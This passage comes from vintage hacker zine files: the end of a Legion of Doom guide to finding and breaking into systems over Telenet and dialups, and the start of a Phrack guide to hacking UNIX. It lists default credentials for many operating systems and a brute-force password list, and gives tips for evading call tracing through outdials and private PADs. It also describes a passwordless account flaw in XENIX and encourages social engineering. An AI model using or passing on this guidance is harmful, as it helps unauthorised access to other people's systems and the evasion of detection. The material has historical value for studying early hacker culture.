7E1) and connecting. It will spout some garbage at you and then you'll get a prompt saying 'TERMINAL= '. This is your terminal type. If you have vt100 emulation, type it in now. Or just hit return and it will default to dumb terminal mode. You'll now get a prompt that looks like a @. From here, type @c mail and then it will ask for a Username. Enter 'phones' for the username. When it asks for a password, enter 'phones' again. From this point, it is menu driven. Use this to locate your local dialup, and call it back locally. If you don't have a local dialup, then use whatever means you wish to connect to one long distance (more on this later). When you call your local dialup, you will once again go through the TERMINAL= stuff, and once again you'll be presented with a @. This prompt lets you know you are connected to a Telenet PAD. PAD stands for either Packet Assembler/Disassembler (if you talk to an engineer), or Public Access Device (if you talk to Telenet's marketing people.) The first description is more correct. Telenet works by taking the data you enter in on the PAD you dialed into, bundling it into a 128 byte chunk (normally... this can be changed), and then transmitting it at speeds ranging from 9600 to 19,200 baud to another PAD, who then takes the data and hands it down to whatever computer or system it's connected to. Basically, the PAD allows two computers that have different baud rates or communication protocols to communicate with each other over a long distance. Sometimes you'll notice a time lag in the remote machines response. This is called PAD Delay, and is to be expected when you're sending data through several different links. What do you do with this PAD? You use it to connect to remote computer systems by typing 'C' for connect and then the Network User Address (NUA) of the system you want to go to. An NUA takes the form of 031103130002520 ___/___/___/ | | | | | |____ network address | |_________ area prefix |______________ DNIC This is a summary of DNIC's (taken from Blade Runner's file on ItaPAC) according to their country and network name. DNIC Network Name Country DNIC Network Name Country _______________________________________________________________________________ | 02041 Datanet 1 Netherlands | 03110 Telenet USA 02062 DCS Belgium | 03340 Telepac Mexico 02080 Transpac France | 03400 UDTS-Curacau Curacau 02284 Telepac Switzerland | 04251 Isranet Israel 02322 Datex-P Austria | 04401 DDX-P Japan 02329 Radaus Austria | 04408 Venus-P Japan 02342 PSS UK | 04501 Dacom-Net South Korea 02382 Datapak Denmark | 04542 Intelpak Singapore 02402 Datapak Sweden | 05052 Austpac Australia 02405 Telepak Sweden | 05053 Midas Australia 02442 Finpak Finland | 05252 Telepac Hong Kong 02624 Datex-P West Germany | 05301 Pacnet New Zealand 02704 Luxpac Luxembourg | 06550 Saponet South Africa 02724 Eirpak Ireland | 07240 Interdata Brazil 03020 Datapac Canada | 07241 Renpac Brazil 03028 Infogram Canada | 09000 Dialnet USA 03103 ITT/UDTS USA | 07421 Dompac French Guiana 03106 Tymnet USA | There are two ways to find interesting addresses to connect to. The first and easiest way is to obtain a copy of the LOD/H Telenet Directory from the LOD/H Technical Journal 4 or 2600 Magazine. Jester Sluggo also put out a good list of non-US addresses in Phrack Inc. Newsletter Issue 21. These files will tell you the NUA, whether it will accept collect calls or not, what type of computer system it is (if known) and who it belongs to (also if known.) The second method of locating interesting addresses is to scan for them manually. On Telenet, you do not have to enter the 03110 DNIC to connect to a Telenet host. So if you saw that 031104120006140 had a VAX on it you wanted to look at, you could type @c 412 614 (0's can be ignored most of the time). If this node allows collect billed connections, it will say 412 614 CONNECTED and then you'll possibly get an identifying header or just a Username: prompt. If it doesn't allow collect connections, it will give you a message such as 412 614 REFUSED COLLECT CONNECTION with some error codes out to the right, and return you to the @ prompt. There are two primary ways to get around the REFUSED COLLECT message. The first is to use a Network User Id (NUI) to connect. An NUI is a username/pw combination that acts like a charge account on Telenet. To collect to node 412 614 with NUI junk4248, password 525332, I'd type the following: @c 412 614,junk4248,525332 <---- the 525332 will *not* be echoed to the screen. The problem with NUI's is that they're hard to come by unless you're a good social engineer with a thorough knowledge of Telenet (in which case you probably aren't reading this section), or you have someone who can provide you with them. The second way to connect is to use a private PAD, either through an X.25 PAD or through something like Netlink off of a Prime computer (more on these two below). The prefix in a Telenet NUA oftentimes (not always) refers to the phone Area Code that the computer is located in (i.e. 713 xxx would be a computer in Houston, Texas). If there's a particular area you're interested in, (say, New York City 914), you could begin by typing @c 914 001 . If it connects, you make a note of it and go on to 914 002. You do this until you've found some interesting systems to play with. Not all systems are on a simple xxx yyy address. Some go out to four or five digits (914 2354), and some have decimal or numeric extensions (422 121A = 422 121.01). You have to play with them, and you never know what you're going to find. To fully scan out a prefix would take ten million attempts per prefix. For example, if I want to scan 512 completely, I'd have to start with 512 00000.00 and go through 512 00000.99, then increment the address by 1 and try 512 00001.00 through 512 00001.99. A lot of scanning. There are plenty of neat computers to play with in a 3-digit scan, however, so don't go berserk with the extensions. Sometimes you'll attempt to connect and it will just be sitting there after one or two minutes. In this case, you want to abort the connect attempt by sending a hard break (this varies with different term programs, on Procomm, it's ALT-B), and then when you get the @ prompt back, type 'D' for disconnect. If you connect to a computer and wish to disconnect, you can type @ and you it should say TELENET and then give you the @ prompt. From there, type D to disconnect or CONT to re-connect and continue your session uninterrupted. Outdials, Network Servers, and PADs ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ In addition to computers, an NUA may connect you to several other things. One of the most useful is the outdial. An outdial is nothing more than a modem you can get to over telenet -- similar to the PC Pursuit concept, except that these don't have passwords on them most of the time. When you connect, you will get a message like 'Hayes 1200 baud outdial, Detroit, MI', or 'VEN-TEL 212 Modem', or possibly 'Session 1234 established on Modem 5588.' The best way to figure out the commands on these is to type ? or H or HELP -- this will get you all the information that you need to use one. Safety tip here -- when you are hacking *any* system through a phone dialup, always use an outdial or a diverter, especially if it is a local phone number to you. More people get popped hacking on local computers than you can imagine, Intra-LATA calls are the easiest things in the world to trace inexpensively. Another nice trick you can do with an outdial is use the redial or macro function that many of them have. First thing you do when you connect is to invoke the 'Redial Last Number' facility. This will dial the last number used, which will be the one the person using it before you typed. Write down the number, as no one would be calling a number without a computer on it. This is a good way to find new systems to hack. Also, on a VENTEL modem, type 'D' for Display and it will display the five numbers stored as macros in the modem's memory. There are also different types of servers for remote Local Area Networks (LAN) that have many machine all over the office or the nation connected to them. I'll discuss identifying these later in the computer ID section. And finally, you may connect to something that says 'X.25 Communication PAD' and then some more stuff, followed by a new @ prompt. This is a PAD just like the one you are on, except that all attempted connections are billed to the PAD, allowing you to connect to those nodes who earlier refused collect connections. This also has the added bonus of confusing where you are connecting from. When a packet is transmitted from PAD to PAD, it contains a header that has the location you're calling from. For instance, when you first connected to Telenet, it might have said 212 44A CONNECTED if you called from the 212 area code. This means you were calling PAD number 44A in the 212 area. That 21244A will be sent out in the header of all packets leaving the PAD. Once you connect to a private PAD, however, all the packets going out from *it* will have it's address on them, not yours. This can be a valuable buffer between yourself and detection. Phone Scanning ~~~~~~~~~~~~~~ Finally, there's the time-honored method of computer hunting that was made famous among the non-hacker crowd by that Oh-So-Technically-Accurate movie Wargames. You pick a three digit phone prefix in your area and dial every number from 0000 --> 9999 in that prefix, making a note of all the carriers you find. There is software available to do this for nearly every computer in the world, so you don't have to do it by hand. Part Three: I've Found a Computer, Now What? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This next section is applicable universally. It doesn't matter how you found this computer, it could be through a network, or it could be from carrier scanning your High School's phone prefix, you've got this prompt this prompt, what the hell is it? I'm *NOT* going to attempt to tell you what to do once you're inside of any of these operating systems. Each one is worth several G-files in its own right. I'm going to tell you how to identify and recognize certain OpSystems, how to approach hacking into them, and how to deal with something that you've never seen before and have know idea what it is. VMS - The VAX computer is made by Digital Equipment Corporation (DEC), and runs the VMS (Virtual Memory System) operating system. VMS is characterized by the 'Username:' prompt. It will not tell you if you've entered a valid username or not, and will disconnect you after three bad login attempts. It also keeps track of all failed login attempts and informs the owner of the account next time s/he logs in how many bad login attempts were made on the account. It is one of the most secure operating systems around from the outside, but once you're in there are many things that you can do to circumvent system security. The VAX also has the best set of help files in the world. Just type HELP and read to your heart's content. Common Accounts/Defaults: [username: password [[,password]]] SYSTEM: OPERATOR or MANAGER or SYSTEM or SYSLIB OPERATOR: OPERATOR SYSTEST: UETP SYSMAINT: SYSMAINT or SERVICE or DIGITAL FIELD: FIELD or SERVICE GUEST: GUEST or unpassworded DEMO: DEMO or unpassworded DECNET: DECNET DEC-10 - An earlier line of DEC computer equipment, running the TOPS-10 operating system. These machines are recognized by their '.' prompt. The DEC-10/20 series are remarkably hacker-friendly, allowing you to enter several important commands without ever logging into the system. Accounts are in the format [xxx,yyy] where xxx and yyy are integers. You can get a listing of the accounts and the process names of everyone on the system before logging in with the command .systat (for SYstem STATus). If you seen an account that reads [234,1001] BOB JONES, it might be wise to try BOB or JONES or both for a password on this account. To login, you type .login xxx,yyy and then type the password when prompted for it. The system will allow you unlimited tries at an account, and does not keep records of bad login attempts. It will also inform you if the UIC you're trying (UIC = User Identification Code, 1,2 for example) is bad. Common Accounts/Defaults: 1,2: SYSLIB or OPERATOR or MANAGER 2,7: MAINTAIN 5,30: GAMES UNIX - There are dozens of different machines out there that run UNIX. While some might argue it isn't the best operating system in the world, it is certainly the most widely used. A UNIX system will usually have a prompt like 'login:' in lower case. UNIX also will give you unlimited shots at logging in (in most cases), and there is usually no log kept of bad attempts. Common Accounts/Defaults: (note that some systems are case sensitive, so use lower case as a general rule. Also, many times the accounts will be unpassworded, you'll just drop right in!) root: root admin: admin sysadmin: sysadmin or admin unix: unix uucp: uucp rje: rje guest: guest demo: demo daemon: daemon sysbin: sysbin Prime - Prime computer company's mainframe running the Primos operating system. The are easy to spot, as the greet you with 'Primecon 18.23.05' or the like, depending on the version of the operating system you run into. There will usually be no prompt offered, it will just look like it's sitting there. At this point, type 'login '. If it is a pre-18.00.00 version of Primos, you can hit a bunch of ^C's for the password and you'll drop in. Unfortunately, most people are running versions 19+. Primos also comes with a good set of help files. One of the most useful features of a Prime on Telenet is a facility called NETLINK. Once you're inside, type NETLINK and follow the help files. This allows you to connect to NUA's all over the world using the 'nc' command. For example, to connect to NUA 026245890040004, you would type @nc :26245890040004 at the netlink prompt. Common Accounts/Defaults: PRIME PRIME or PRIMOS PRIMOS_CS PRIME or PRIMOS PRIMENET PRIMENET SYSTEM SYSTEM or PRIME NETLINK NETLINK TEST TEST GUEST GUEST GUEST1 GUEST HP-x000 - This system is made by Hewlett-Packard. It is characterized by the ':' prompt. The HP has one of the more complicated login sequneces around -- you type 'HELLO SESSION NAME,USERNAME,ACCOUNTNAME,GROUP'. Fortunately, some of these fields can be left blank in many cases. Since any and all of these fields can be passworded, this is not the easiest system to get into, except for the fact that there are usually some unpassworded accounts around. In general, if the defaults don't work, you'll have to brute force it using the common password list (see below.) The HP-x000 runs the MPE operating system, the prompt for it will be a ':', just like the logon prompt. Common Accounts/Defaults: MGR.TELESUP,PUB User: MGR Acct: HPONLYG rp: PUB MGR.HPOFFICE,PUB unpassworded MANAGER.ITF3000,PUB unpassworded FIELD.SUPPORT,PUB user: FLD, others unpassworded MAIL.TELESUP,PUB user: MAIL, others unpassworded MGR.RJE unpassworded FIELD.HPPl89 ,HPPl87,HPPl89,HPPl96 unpassworded MGR.TELESUP,PUB,HPONLY,HP3 unpassworded IRIS - IRIS stands for Interactive Real Time Information System. It originally ran on PDP-11's, but now runs on many other minis. You can spot an IRIS by the 'Welcome to "IRIS" R9.1.4 Timesharing' banner, and the ACCOUNT ID? prompt. IRIS allows unlimited tries at hacking in, and keeps no logs of bad attempts. I don't know any default passwords, so just try the common ones from the password database below. Common Accounts: MANAGER BOSS SOFTWARE DEMO PDP8 PDP11 ACCOUNTING VM/CMS - The VM/CMS operating system runs in International Business Machines (IBM) mainframes. When you connect to one of these, you will get message similar to 'VM/370 ONLINE', and then give you a '.' prompt, just like TOPS-10 does. To login, you type 'LOGON '. Common Accounts/Defaults are: AUTOLOG1: AUTOLOG or AUTOLOG1 CMS: CMS CMSBATCH: CMS or CMSBATCH EREP: EREP MAINT: MAINT or MAINTAIN OPERATNS: OPERATNS or OPERATOR OPERATOR: OPERATOR RSCS: RSCS SMART: SMART SNA: SNA VMTEST: VMTEST VMUTIL: VMUTIL VTAM: VTAM NOS - NOS stands for Networking Operating System, and runs on the Cyber computer made by Control Data Corporation. NOS identifies itself quite readily, with a banner of 'WELCOME TO THE NOS SOFTWARE SYSTEM. COPYRIGHT CONTROL DATA 1978,1987.' The first prompt you will get will be FAMILY:. Just hit return here. Then you'll get a USER NAME: prompt. Usernames are typically 7 alpha-numerics characters long, and are *extremely* site dependent. Operator accounts begin with a digit, such as 7ETPDOC. Common Accounts/Defaults: $SYSTEM unknown SYSTEMV unknown Decserver- This is not truly a computer system, but is a network server that has many different machines available from it. A Decserver will say 'Enter Username>' when you first connect. This can be anything, it doesn't matter, it's just an identifier. Type 'c', as this is the least conspicuous thing to enter. It will then present you with a 'Local>' prompt. From here, you type 'c ' to connect to a system. To get a list of system names, type 'sh services' or 'sh nodes'. If you have any problems, online help is available with the 'help' command. Be sure and look for services named 'MODEM' or 'DIAL' or something similar, these are often outdial modems and can be useful! GS/1 - Another type of network server. Unlike a Decserver, you can't predict what prompt a GS/1 gateway is going to give you. The default prompt it 'GS/1>', but this is redifinable by the system administrator. To test for a GS/1, do a 'sh d'. If that prints out a large list of defaults (terminal speed, prompt, parity, etc...), you are on a GS/1. You connect in the same manner as a Decserver, typing 'c '. To find out what systems are available, do a 'sh n' or a 'sh c'. Another trick is to do a 'sh m', which will sometimes show you a list of macros for logging onto a system. If there is a macro named VAX, for instance, type 'do VAX'. The above are the main system types in use today. There are hundreds of minor variants on the above, but this should be enough to get you started. Unresponsive Systems ~~~~~~~~~~~~~~~~~~~~ Occasionally you will connect to a system that will do nothing, but sit there. This is a frustrating feeling, but a methodical approach to the system will yield a response if you take your time. The following list will usually make *something* happen. 1) Change your parity, data length, and stop bits. A system that won't respond at 8N1 may react at 7E1 or 8E2 or 7S2. If you don't have a term program that will let you set parity to EVEN, ODD, SPACE, MARK, and NONE, with data length of 7 or 8, and 1 or 2 stop bits, go out and buy one. While having a good term program isn't absolutely necessary, it sure is helpful. 2) Change baud rates. Again, if your term program will let you choose odd baud rates such as 600 or 1100, you will occasionally be able to penetrate some very interesting systems, as most systems that depend on a strange baud rate seem to think that this is all the security they need... 3) Send a series of 's. 4) Send a hard break followed by a . 5) Type a series of .'s (periods). The Canadian network Datapac responds to this. 6) If you're getting garbage, hit an 'i'. Tymnet responds to this, as does a MultiLink II. 7) Begin sending control characters, starting with ^A --> ^Z. 8) Change terminal emulations. What your vt100 emulation thinks is garbage may all of a sudden become crystal clear using ADM-5 emulation. This also relates to how good your term program is. 9) Type LOGIN, HELLO, LOG, ATTACH, CONNECT, START, RUN, BEGIN, LOGON, GO, JOIN, HELP, and anything else you can think of. 10) If it's a dialin, call the numbers around it and see if a company answers. If they do, try some social engineering. Brute Force Hacking ~~~~~~~~~~~~~~~~~~~ There will also be many occasions when the default passwords will not work on an account. At this point, you can either go onto the next system on your list, or you can try to 'brute-force' your way in by trying a large database of passwords on that one account. Be careful, though! This works fine on systems that don't keep track of invalid logins, but on a system like a VMS, someone is going to have a heart attack if they come back and see '600 Bad Login Attempts Since Last Session' on their account. There are also some operating systems that disconnect after 'x' number of invalid login attempts and refuse to allow any more attempts for one hour, or ten minutes, or sometimes until the next day. The following list is taken from my own password database plus the database of passwords that was used in the Internet UNIX Worm that was running around in November of 1988. For a shorter group, try first names, computer terms, and obvious things like 'secret', 'password', 'open', and the name of the account. Also try the name of the company that owns the computer system (if known), the company initials, and things relating to the products the company makes or deals with. Password List ============= aaa daniel jester rascal academia danny johnny really ada dave joseph rebecca adrian deb joshua remote aerobics debbie judith rick airplane deborah juggle reagan albany december julia robot albatross desperate kathleen robotics albert develop kermit rolex alex diet kernel ronald alexander digital knight rosebud algebra discovery lambda rosemary alias disney larry roses alpha dog lazarus ruben alphabet drought lee rules ama duncan leroy ruth amy easy lewis sal analog eatme light saxon anchor edges lisa scheme andy erenity arrow elizabeth maggot sex arthur ellen magic shark asshole emerald malcolm sharon athena engine mark shit atmosphere engineer markus shiva bacchus enterprise marty shuttle badass enzyme marvin simon bailey euclid master simple banana evelyn maurice singer bandit extension merlin single banks fairway mets smile bass felicia michael smiles batman fender michelle smooch beauty fermat mike smother beaver finite minimum snatch beethoven flower minsky snoopy beloved foolproof mogul soap benz football moose socrates beowulf format mozart spit berkeley forsythe nancy spring berlin fourier napoleon subway beta fred network success beverly friend newton summer angerine bumbling george osiris tape cardinal gertrude outlaw target carmen gibson oxford taylor carolina ginger pacific telephone caroline gnu painless temptation castle golf pam tiger cat golfer paper toggle celtics gorgeous password tomato change graham pat toyota charles gryphon patricia trivial charming guest penguin unhappy charon guitar pete unicorn chester hacker peter unknown cigar harmony philip urchin classic harold phoenix utility coffee harvey pierre vicky coke heinlein pizza virginia collins hello plover warren comrade help polynomial water computer herbert praise weenie condo honey prelude whatnot condom horse prince whitney cookie imperial protect will cooper include pumpkin william create ingres puppet willie creation innocuous rabbit winston I hope this file has been of some help in getting started. If you're asking yourself the question 'Why hack?', then you've probably wasted a lot of time reading this, as you'll never understand. For those of you who have read this and found it useful, please send a tax-deductible donation of $5.00 (or more!) in the name of the Legion of Doom to: The American Cancer Society 90 Park Avenue New York, NY 10016 ******************************************************************************* References: 1) Introduction to ItaPAC by Blade Runner Telecom Security Bulletin 1 2) The IBM VM/CMS Operating System by Lex Luthor The LOD/H Technical Journal 2 3) Hacking the IRIS Operating System by The Leftist The LOD/H Technical Journal 3 4) Hacking CDC's Cyber by Phrozen Ghost Phrack Inc. Newsletter 18 5) USENET comp.risks digest (various authors, various issues) 6) USENET unix.wizards forum (various authors) 7) USENET info-vax forum (various authors) Recommended Reading: 1) Hackers by Steven Levy 2) Out of the Inner Circle by Bill Landreth 3) Turing's Man by J. David Bolter 4) Soul of a New Machine by Tracy Kidder 5) Neuromancer, Count Zero, Mona Lisa Overdrive, and Burning Chrome, all by William Gibson 6) Reality Hackers Magazine c/o High Frontiers, P.O. Box 40271, Berkeley, California, 94704, 415-995-2606 7) Any of the Phrack Inc. Newsletters & LOD/H Technical Journals you can find. Acknowledgements: Thanks to my wife for putting up with me. Thanks to Lone Wolf for the RSTS & TOPS assistance. Thanks to Android Pope for proofreading, suggestions, and beer. Thanks to The Urvile/Necron 99 for proofreading & Cyber info. Thanks to Eric Bloodaxe for wading through all the trash. Thanks to the users of Phoenix Project for their contributions. Thanks to Altos Computer Systems, Munich, for the chat system. Thanks to the various security personel who were willing to talk to me about how they operate. Boards: I can be reached on the following systems with some regularity; The Phoenix Project: 512/441-3088 300-2400 baud Hacker's Den-80: 718/358-9209 300-1200 baud Smash Palace South: 512/478-6747 300-2400 baud Smash Palace North: 612/633-0509 300-2400 baud ************************************* EOF ************************************* ========================================================================= ==Phrack Inc.== Volume Two, Issue 22, File 5 of 12 /|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/| |/ |/ /| An Indepth Guide In Hacking UNIX /| |/ and |/ /| The Concept Of Basic Networking Utility /| |/ |/ /| By Red Knight /| |/ |/ /| Member of the /| |/ Phreakers/Hackers Underground Network |/ /| /| |/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/ Brief History On UNIX ~~~~~~~~~~~~~~~~~~~~~ Its because of Ken Tompson that today we are able to hack Unix. He used to work for Bell Labs in the 1960s. Tompson started out using the MULTICS OS which was later eliminated and Tompson was left without an operating system to work with. Tompson had to come up with something real quick. He did some research and and in 1969 UNIX came out, which was a single user and it did not have many capabilities. A combined effort with others enabled him to rewrite the version in C and add some good features. This version was released in 1973 and was made available to the public. This was the first begining of UNIX in its presently known form. The more refined version of UNIX, today know as UNIX system V developed by Berkley University has unique capabilities. Various types of UNIXes are CPIX, Berkeley Ver 4.1, Berkeley 4.2, FOS, Genix, HP-UX, IS/I, OSx, PC-IX, PERPOS, Sys3, Ultrix, Zeus, Xenix, UNITY, VENIX, UTS, Unisys, Unip lus+, UNOS, Idris, QNIX, Coherent, Cromix, System III, System 7, Sixth edition. The Article Itself ~~~~~~~~~~~~~~~~~~ I believe that hacking into any system requires knowledge of the operating system itself. Basically what I will try to do is make you more familiar with UNIX operation and its useful commands that will be advantageous to you as a hacker. This article contains indepth explainations. I have used the UNIX System V to write this article. Error Messages: (UNIX System V) ~~~~~~~~~~~~~~ Login Incorrect - An invalid ID and/or password was entered. This means nothing. In UNIX there is no way guessing valid user IDs. You may come across this one when trying to get in. No More Logins - This happens when the system will not accept anymore logins. The system could be going down. Unknown Id - This happens if an invalid id is entered using (su) command. Unexpected Eof In File - The file being stripped or the file has been damaged. Your Password Has Expired - This is quite rare although there are situations where it can happen. Reading the etc/passwd will show you at how many intervals it changes. You May Not Change The Password - The password has not yet aged enough. The administrator set the quotas for the users. Unknown Group (Group's Name) - Occurs when chgrp is executed, group does not exist. Sorry - Indicated that you have typed in an invalid super user password (execution of the su). Permission Denied! - Indicated you must be the owner or a super user to change password. Sorry <( Of Weeks) Since Last Change - This will happen when password has has not aged enough and you tried to change it (password). (Directory Name): No Permission - You are trying to remove a directory which you have no permission to. (File Name) Not Removed - Trying to delete a file owned by another user that you do not have write permission for. (Dirname) Not Removed - Ownership of the dir is not your that your trying to delete. (Dirname) Not Empty - The directory contains files so you must have to delete the files before execcant open [file name] - defined wrong path, file name or you have no read permission. Cp: (File Name) And (File Name) Are Identical - Self explanatory. Cannot Locate Parent Directory - Occurs when using mv. (File name) Not Found - File which your trying to move does not exist. You Have Mail - Self explanatory. Basic Networking Utility Error Messages ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Cu: Not found - Networking not installed. Login Failed - Invalid id/pw or wrong number specified. Dial Failed - The systen never answered due to a wrong number. UUCP Completely Failed - Did not specify file after -s. Wrong Time to Call - You called at the time at a time not specified in the Systems file. System not in systems - You called a remote not in the systems file. Logon Format ~~~~~~~~~~~~ The first thing you must do is switch to lower case. To identifing a UNIX, this is what you will see; AT&T Unix System V 3.0 (eg of a system identifier) login: or Login: Any of these is a UNIX. Here is where you will have to guess at a user valid id. Here are some that I have come across; glr, glt, radgo, rml, chester, cat, lom, cora, hlto, hwill, edcasey, and also some containing numbers; smith1, mitu6, or special characters in it; bremer$, jfox. Login names have to be 3 to 8 chracters in length, lowercase, and must start with a letter. In some XENIX systems one may login as "guest" User Level Accounts (Lower Case) ~~~~~~~~~~~~~~~~~~~ In Unix there are what is called. These accounts can be used at the "login:" prompt. Here is a list: sys bin trouble daemon uucp nuucp rje lp adm Super-User Accounts ~~~~~~~~~~~~~~~~~~~ There is also a super-user login which make UNIX worth hacking. The accounts are used for a specific job. In large systems these logins are assingned to users who have a responsibilty to maintain subsystems. They are as follows (all lower case); root - This is a must the system comes configured with it. It has no restriction. It has power over every other account. unmountsys - Unmounts files setup - System set up makefsys - Makes a new file sysadm - Allows useful S.A commands (doesn't need root login) powerdown - Powering system down mountfsys - Mounts files checkfsys - Checks file These accounts will definitly have passwords assigned to them. These accounts are also commands used by the system administrator. After the login prompt you will receive a password prompt: password: or Password: Enter the password (it will not echo). The password rule is as follows; Each password has to contain at least 6 characters and maximum of 8 characters. Two of which are to be alphabetic letters and at least one being a number or a special character. The alphabetic digits could be in upper case or lower case. Here are some of the passwords that I have seen; Ansuya1, PLAT00N6, uFo/78, ShAsHi.., Div417co. The passwords for the super user accounts will be difficult to hack try the accounts interchangebly; login:sysadm password:makefsys, or rje1, sysop, sysop1, bin4, or they might contain letters, numbers, or special chracters in them. It could be anything. The user passwords are changed by an aging proccess at successive intervals. The users are forced to changed it. The super-user will pick a password that will not need changing for a long period of time. You Have Made It! ~~~~~~~~~~~~~~~~~ The hard part is over and hopefully you have hacked a super-user account. Remember Control-d stops a process and also logs you off. The next thing you will probably see is the system news. Ex; login:john password:hacker1 System news There will be no networking offered to the users till August 15, due to hardware problems. (Just An Example) $ $ (this is the Unix prompt) - Waiting for a command to be entered. - Means your logged in as root (Very Good). A Word About The XENIX System III (Run On The Tandy 6000) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The largest weakness in the XENIX System III occurs after the installation of the Profile-16 or more commonly know as the Filepro-16. I have seen the Filepro-16 installed in many systems. The installation process creates an entry in the password file for a user named \fBprofile\fR, an account that who owns and administors the database. The great thing about it is that when the account is created, no password is assigned to it. The database contains executable to maintain it. The database creation programs perform a \fBsetuid\fR to boot up the \fBoot\fR thereby giving a person the whole C Shell to gain Super User privilege same as root. Intresting huh! (* Note: First the article will inform you of how the Unix is made up.) The Unix is made if three components - The Shell, The Kernal, File System. The Kernal ~~~~~~~~~~ You could say that the kernal is the heart of the Unix operating system. The kernal is a low level language lower than the shell which maintains processes. The kernal handles memory usage, maintains file system the sofware and hardware devices. The Shell ~~~~~~~~~ The shell a higher level language. The shell had two important uses, to act as command interpreture for example using commands like cat or who. The shell is at work figuring out whether you have entered a command correctly or not. The second most important reason for the shell is its ability to be used as programing language. Suppose your performing some tasks repeatedly over and over again, you can program the shell to do this for you. (Note: This article will not cover shell programming.) ( Instead B.N.N will be covered. ) The File System ~~~~~~~~~~~~~~~ The file system in Unix is divided into 3 catagories: Directories, ordinary files and special files (d,-). Basic Stucture: (/)-this is abreviation for the root dirctory. root level root (/) system -------------------------------------|---------------------------------- level | | | | | | | | /unix /etc /dev /tmp /lib /usr /usr2 /bin | _____|_____ login passwd | | | level /john /cathy ________________________|_______________ | | | | | | .profile /mail /pers /games /bin /michelle *.profile - in case you | __|______ | __|_______ wish to change your environment, but capital | | data | | | after you log off, it sets it to othello starwars letter letter1 default. /unix - This is the kernal. /etc - Contains system administrators files,Most are not available to the regular user (this dirrctory contains the /passwd file). Here are some files under /etc directory: /etc/passwd /etc/utmp /etc/adm/sulog /etc/motd /etc/group /etc/conf /etc/profile /dev - contains files for physical devices such as printer and the disk drives /tmp - temporary file directory /lib - dirctory that contains programs for high level languages /usr - this directory contains dirctories for each user on the system /bin - contain executable programs (commands) The root also contains: /bck - used to mount a back up file system. /install - Used to install and remove utilities /lost+found - This is where all the removed files go, this dir is used by fsck /save -A utility used to save data /mnt - Used for temporary mounting **Now the fun part scouting around** Local Commands (Explained In Details) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ At the unix prompt type the pwd command. It will show you the current working directory you are in. $ pwd $ /usr/admin - assuming that you have hacked into a super user account check fsys $ This gives you the full login directory. The / before tell you the location of the root directory. Or (REFER TO THE DIAGRAM ABOVE) $ pwd $ /usr/john $ Assuming you have hacked into John's account. Lets say you wanted to move down to the Michelle directory that contains letters. You would type in; $ cd michelle or cd usr/john/michelle $ pwd $ /usr/john/michelle $ Going back one directory up type in: $ cd .. or going to your parent directory just type in "cd" Listing file directories assuming you have just logged in: $ ls /usr/john mail pers games bin michelle This wont give you the .profile file. To view it type $ cd $ ls -a : : .profile To list file names in Michelle's directory type in: $ ls michelle (that if your in the johns directory) $ ls /usr/john/michelle(parent dir) ls -l ~~~~~ The ls -l is an an important command in unix.This command displays the whole directory in long format :Run this in parent directory. $ ls -l total 60 -rwxr-x--- 5 john bluebox 10 april 9 7:04 mail drwx------ 7 john bluebox 30 april 2 4:09 pers : : : : : : : : : : : : : : -rwxr-x--- 6 cathy bluebox 13 april 1 13:00 partys : : : : : : : $ The total 60 tells one the ammount of disk space used in a directory. The -rwxr-x--- is read in triples of 3. The first chracter eg (-, d, b, c) means as follows: - is an ordinary file, d is a directory, b is block file, c is a character file. The r stands for read permission, w is write permission, x is execute. The first column is read in 3 triples as stated above. The first group of 3 (in -rwxr-x---) after the "-" specifies the permission for the owner of the file, the second triple are for the groups (the fourth column) and the last triple are the permissions for all other users. Therefore, the -rwxr-x--- is read as follows. The owner, John, has permission to read, write, and execute anything in the bin directory but the group has no write permission to it and the rest of the users have no permission at all. The format of one of the lines in the above output is as follows: file type-permissions, links, user's name, group, bytes taken, date, time when last renued, directory, or file name. *** You will be able to read, execute Cathy's *** *** file named partly due to the same group. *** Chmod ~~~~~ The chmod command changes permission of a directory or a file. Format is chmod who+, -, =r , w, x The who is substituted by u-user, g-group, o-other users, a-all. The + means add permission, - means remove permission, = - assign. Example: If you wanted all other users to read the file name mail, type: $ chmod o+r mail Cat ~~~ Now suppose you wanted to read the file letter. There are two ways to doing this. First go to the michelle directory then type in: $ cat letter line one ...\ line two ... }the output of letter line three../ $ or If you are in the parent directory type in: $ cat /usr/john/michelle/letter and you will have the same output. Some cat options are -s, -u, -v, -e, -t Special Chracters in Unix ~~~~~~~~~~~~~~~~~~~~~~~~~ * - Matches any number of single characters eg. ls john* will list all files that begin with john [...] - Matchs any one of the chracter in the [ ] ? - Matches any single chracter & - Runs a process in the backgroung leaving your terminal free $ - Values used for variables also $n - null argument > - Redirectes output < - Redirects input to come from a file >> - Redirects command to be added to the end of a file | - Pipe output (eg:who|wc-l tells us how many users are online) "..." - Turn of meaning of special chracters excluding $,` `...` - Allows command output in to be used in a command line '...' - Turns of special meaning of all chracters Continuation Of Local Commands ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ man [command] or [c/r] -will give you a list of commands explainations help - available on some UNIX systems mkdir [dir name(s)] - makes a directory rmdir [dir name(s)] - removes directory.You wont be able to remove the directory if it contains files in them rm [file name(s)] - removes files. rm * will erase all files in the current dir. Be carefull you! Some options are: [-f unconditional removal] [-i Prompts user for y or n] ps [-a all processes except group leaders] [-e all processes] [-f the whole list] - This command reports processes you are running eg: $ps PID TTY TIME COMMAND 200 tty09 14:20 ps The systems reports (PID - process idenetification number which is a number from 1-30,000 assigned to UNIX processes) It also reports the TTY,TIME and the COMMAND being executed at the time. To stop a process enter : $kill [PID] (this case its 200) 200 terminated $ grep (argument) - searches for an file that contains the argument mv (file names(s)) ( dir name ) - renames a file or moves it to another directory cp [file name] [file name] - makes a copy of a file write [login name ] - to write to other logged in users. Sort of a chat mesg [-n] [-y] - doesn't allow others to send you messages using the write command. Wall used by system adm overrides it. $ [file name] - to execute any file wc [file name] - Counts words, characters,lines in a file stty [modes] - Set terminal I/O for the current devices sort [filename] - Sorts and merges files many options spell [file name] > [file name] - The second file is where the misspelt words are entered date [+%m%d%y*] [+%H%%M%S] - Displays date acoording to options at [-r] [-l] [job] - Does a 